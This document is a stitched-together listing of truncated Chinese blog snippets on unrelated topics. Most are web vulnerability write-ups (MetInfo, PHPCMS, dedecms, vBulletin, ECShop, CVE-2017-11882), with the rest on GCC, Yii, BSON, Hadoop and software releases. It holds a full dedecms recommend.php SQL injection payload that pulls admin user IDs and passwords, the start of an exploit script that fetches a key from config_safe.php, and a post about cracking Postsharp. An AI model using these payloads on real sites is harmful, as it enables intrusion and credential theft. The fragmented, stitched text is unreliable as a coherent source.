0x01 此漏洞是由于未将decode解码后的数据过滤,而直接带入SQL语句中,从而导致SQL盲注漏洞. 0x02 漏洞分析:此处复现为metinfo6.1.3版本,漏洞最初产生为:/app/system/user/web/register.class.php 94~107行: 可以看到此函数将 GET,POST,COOKIE,过来的数据经过decode解码后直接赋值给$username变量,然后将此变量带入get_user_valid()函数,跟进: 可以看到有将此可控变量引入get_user…
#coding=utf-8 import requests import re import sys import time #获取config_safe.php中的 key def getKey(url,headers,local_url): try: url_key = url + "/config/config_safe.php" rsp = requests.get(url_key,headers) p = re.compile(r'<\?php\/\*(.*)\*\/\…
dedecms即织梦(PHP开源网站内容管理系统).织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: www.xxx.com/plus/recommend.php.... EXP: plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\…
漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码.未经验证的恶意访问者可通过向index.php发出包含 routestring=参数的GET 请求,从而触发文件包含漏洞,最终导致远程代码执行漏洞,影响版本:vBulletin v5.x 漏洞原理 index.php页面发送GET请求去使用routestring参数包含本地文件时,层层调用功能函数对routestring的值进行过滤,主要的处理代码位于/incl…
EXP: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'   or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select   CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`  limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILE…
POC https://github.com/embedi/CVE-2017-11882…
项目是基于框架Yii 2.0开发的. 今天梳理一些数据统计功能代码的时候,想把当前运行的sql语句打印出来,然后放到navicat工具里面运行,并分析一下运行效率和调优方案,之前大部分时候都是写增加.删除.修改.查询,这个打印sql语句的还真是用的很少,去官网查了一下资料,完美解决. Yii 2.0提供2种数据操作方式,一种是数据模型[models],一种是[\yii\db\Query()],具体使用哪种,看个人喜好. models模式打印sql语句举例如下: $query = User::fi…
  0x00 环境准备 LaySNS官网:http://www.laysns.com/ 网站源码版本:LaySNS_v2.2.0 程序源码下载:https://pan.lanzou.com/i0l38li 默认后台地址:http://127.0.0.1/admin.php/login/index.html 默认账号密码:admin/admin 测试网站首页: 0x01 代码分析 1.        漏洞文件位置:/application/admin/controller/System.php 第…
0x01 此SQL注入漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似.且较为有趣,故在此分析并附上exp. 0x02 首先复现漏洞,环境为: PHP:5.4.45 + Apache mysql:5.5.53 PHPCMS:V9.6.0-UTF-8 Microsoft Windows 7 旗舰版  OS 版本: 6.1.7601 Service Pack 1 Build 7601 此漏洞复现分三个步骤: 第一步:获取 siteid 访问:/index.php?m=wap&…
FineUIPro/Mvc/Core v6.1.0 正式发布了(2019-12-25),这个版本主要是BUG修正,并增加了一些新特性,建议升级到此版本. 在列举新版本特性之前,我们先来回顾下每次发布大版本的关键时间点: v1.0.0 于 2014-07-30 发布,这也是我们 FineUIPro 产品线的第一个版本,实现了开源版(100多个版本)的全部功能. v2.0.0 于 2014-12-10 发布,半年的时间内我们快速迭代了 10 个小版本,并发布功能完善的 2.0 大版本. v3.0.0…
漏洞概述 ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重. 漏洞评级 严重 影响范围 ECShop全系列版本,包括2.x,3.0.x,3.6.x等. 漏洞分析 0x01. SQL注入 先看 ecshop/user.php:302 $back_act 变量来源于 HTTP_REFERER ,可控. Ecshop 使用了 php 模版引擎 smarty ,该引擎有两个基…
---恢复内容开始--- CentOS 6.6 升级GCC G++ (当前最新GCC/G++版本为v6.1.0) 没有便捷方式, yum update....   yum install 或者 添加yum 的 repo 文件 也不行, 只能更新到 4.4.7! then,  只能手动编译安装了,那么开始第一步下载源代码吧,GO! 1. 获取安装包并解压 wget http://ftp.gnu.org/gnu/gcc/gcc-6.1.0/gcc-6.1.0.tar.bz2 tar -jxvf gc…
原文地址:https://www.cnblogs.com/lzpong/p/5755678.html 我这里是centos7 升级到gcc8.1,过程差不多,参考这篇文章,记录一下. ---原文--- CentOS 6.6 升级GCC G++ (当前最新GCC/G++版本为v6.1.0) 没有便捷方式, yum update....   yum install 或者 添加yum 的 repo 文件 也不行, 只能更新到 4.4.7! then,  只能手动编译安装了,那么开始第一步下载源代码吧,…
[.net 脱壳工具]Sixxpack 最新脱壳机 通杀Sixxpack全版本by -=Msdn5 君临=- 识别方法: 如果无法调戏,请上传附件艾特我.............发帖不易啊..身处大西北,上个52都要FQ..... Tips: 如果值写进去都提示异常,请尝试去掉0x (尝试后没有Unpack请尝试变种/修改版 地址.都不行请跟帖.)--------------------------------------------------------------补一组变种/修改版 地址 …
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行. 举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制. 影响版本: office 2003 office 2007 office 2010 office 2013 office 2016 漏洞复现环境 Kali2017 + windows 7 + offi…
2019.04.18 重要说明 VS2019 正式版已经发布了,Postsharp v6.2.2-Preview(预览版)也开始支持VS2019.不过截至目前,该预览版还不是特别稳定,因此提醒下大家在 Postsharp v6.2.x正式版发布前谨慎使用VS2019进行开发. 要点: Postsharp v6.1.17 于 2019年4月2日发布.这是截至目前最新的正式版.经测试,破解工具可以完美破解.     Postsharp v6.2.2-Preview 同样于2019年4月2日发布.经测…
本章我们将学习特征码的提取与定位,特征码是软件中一段固定的具有标志性的代码片段,特征码的用途非常广泛,最常见的就是杀毒软件的查杀了,查杀就是根据特征码定位技术实现的,再比如木马的免杀也是修改了特征码的一些特征片段而躲避查杀的啦. 本章的内容对于软件破解非常的有用,比如你需要破解一个程序,但你无法定位到关键按钮的事件中去,此时你可以先查看待破解程序使用了那种编程语言来写的,然后自己用对应的编程语言编写一个简单的小程序,并放入容易搜索到的字串,然后提取针对特定语言特定版本的通杀特征,最后应用到需要破…
\x01 漏洞简介 在 2017 年 11 月微软的例行系统补丁发布中,修复了一个 Office 远程代码执行漏洞(缓冲区溢出),编号为 CVE-2017-11882,又称为 "噩梦公式".该漏洞从修复之日起已经隐藏了 17 年之久,而且通杀目前流行的所有 Office 版本,可见其危害程度.该漏洞位于 Office 的 EQNEDT32.EXE 组件中,该组件的作用是通过 OLE 对象的互操作性协助 Office 软件进行公式的处理,由于在拷贝 Office 传入 font name…
通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击 大家肯定知道前几天刚爆出来一个linux内核(Android也用的linux内核)的dirtycow漏洞.此洞可以说是个神洞,通过dirtycow,一个普通权限的app可以做到root权限的文件任意写,随后还可以转化为android上的通用root.就在大家纷纷埋头研究dirtycow的时候,Drammer横空出世,号称也可以root最新版的Android 6.0.1,同时还放出了CCS论文和POC. 那么这…
继上个版本“RDIFramework.NET V2.9版本”的推出,受到了重多客户的认可与选择,V2.9版本是非常成功与稳定的版本,感谢大家的认可与长期以来的关注与支持.V3.0版本在V2.9版本的基础上做了重大更新,如:新增了“序列管理”.“系统参数管理”.“查询引擎与定义与管理”.”消息集中管理“.Web还新增了“MVC版本”.代码生成器可以支持WebUI(WebForm.MVC两种方式)的生成,以及对框架与工作流在MySql下进行了通测完美支持了MySql等等大量新增与重构的东西,在后面的…
BSON 1.0版本规范 本文翻译自 http://bsonspec.org/spec.html BSON是用于存储零个或多个键/值对为一个单一的实体的一个二进制格式.我们称这个实体为文档(Document). 以下语法用于指定BSON标准的1.0版本.我们使用伪BNF语法来(编写)描述.有效数据BSON数据是由非终端显示的文档表示的. 基本类型 以下基本类型用作终端中其余的语法.每种类型必须序列化为小端字节序. 类型 内存宽度 描述 byte 1 byte (8-bits) int32 4 b…
现象:小于1.3.0版本如1.2.6的spring boot, 当指定profile进行参数打入的时候,发现没有问题,但是比如改用1.3.0,1.3.1及其以上版本的时候,发现参数打不进去,经过比对spring-boot-starter-parent的1.2系列与1.3系列的pom.xml,发现在1.3系列的pom中含有如下配置: <properties> <java.version>1.6</java.version> <resource.delimiter&g…
原文 http://restools.hanzify.org/article.asp?id=111 一个如影随形的小精灵会令到你的安装程序更加人性化. 就是这样一个功能的Inno Setup插件, 希望大家喜欢. ^_^Ver2.0 版本: 采用 GDI+ 来处理图片, 所以支持多种类型(bmp, jpg, gif, png, tiff, emf)图片. 并且插件大小缩小为 49KB.注:插件在 Win2000 以上系统有效.  引用来自 fairy.iss ;Inno Setup精灵插件 ve…
[AngularJS] 2.0 版本发布 w5cValidator[AngularJS] 2.0 版本发布   w5cValidator 插件基于angular原有的表单验证,在原有的基础上扩展了一些错误提示的功能,让大家不用在每个表单上写一些提示信息的模板,专心的去实现业务逻辑. 代码地址:https://github.com/why520crazy/w5c-validator-angular 关于v1.x版本的介绍参见:http://www.ngnice.com/posts/69f774dc…
w5cValidator 插件基于angular原有的表单验证,在原有的基础上扩展了一些错误提示的功能,让大家不用在每个表单上写一些提示信息的模板,专心的去实现业务逻辑. 代码地址:https://github.com/why520crazy/w5c-validator-angular 关于v1.x版本的介绍参见:http://www.ngnice.com/posts/69f774dc4d3190 v1.0版本虽然简单的实现了想要的功能,但是没有按照模块独立出来,而且有很多代码不是很规范,这次正…
某pdf转word v6.3.0.2算法分析 [文章标题]某pdf转word v6.3.0.2算法分析 [文章作者]jieliuhouzi[原版下载]www.pdfcword.cn [保护方式]序列号 [分析过程] 一. 去掉随机基址 直接OD载入程序,入口是"一call一jmp",基本上就是VS高版本编译的  为了避免随机基址的影响,先去除随机基址.找到"PE"下一行偏移为6的字节处,将"02"修改为"03",可去掉随机基址…
Sencha Cmd v6.2.0.103 Sencha Cmd 提供几种全局开关命令. 在大多数案例中, 第一步是在Sencha SDK基础上创建应用 例如 Ext JS 或 Sencha Touch: sencha -sdk /path/to/sdk generate app MyApp /path/to/myapp Sencha Cmd 支持 Ext JS 4.1.1a 及更高版本 and Sencha Touch 2.1及更高版本. 使用帮助命令获取帮助: sencha help gen…
Hadoop中的NameNode好比是人的心脏,非常重要,绝对不可以停止工作.在hadoop1时代,只有一个NameNode.如果该NameNode数据丢失或者不能工作,那么整个集群就不能恢复了.这是hadoop1中的单点问题,也是hadoop1不可靠的表现.hadoop2就解决了这个问题. hadoop2.2.0中HDFS的高可靠指的是可以同时启动2个NameNode.其中一个处于工作状态,另一个处于随时待命状态.这样,当一个NameNode所在的服务器宕机时,可以在数据不丢失的情况下,手工或…
大佬博客地址:https://blog.csdn.net/supermao1013/article/category/8269552 docker elasticsearch 集群启动命令 docker run -e ES_JAVA_OPTS="-Xms512m -Xmx512m" -d -p 9200:9200 -p 9300:9300 -p 5601:5601 -v /usr/local/es/config/es1.yml:/usr/share/elasticsearch/conf…
1. 重点特性 1.1 Flink集成 自从Hudi 0.7.0版本支持Flink写入后,Hudi社区又进一步完善了Flink和Hudi的集成.包括重新设计性能更好.扩展性更好.基于Flink状态索引的写入Pipeline:支持Flink写入MOR表:Flink批量读取COW和MOR表:流式读取MOR表:同时支持了Hudi作为Source和Sink的Flink SQL Connector,在Hudi 0.8.0版本发布后,用户可以使用Flink1.11+体验上述所有新特性. 想了解更多Flink…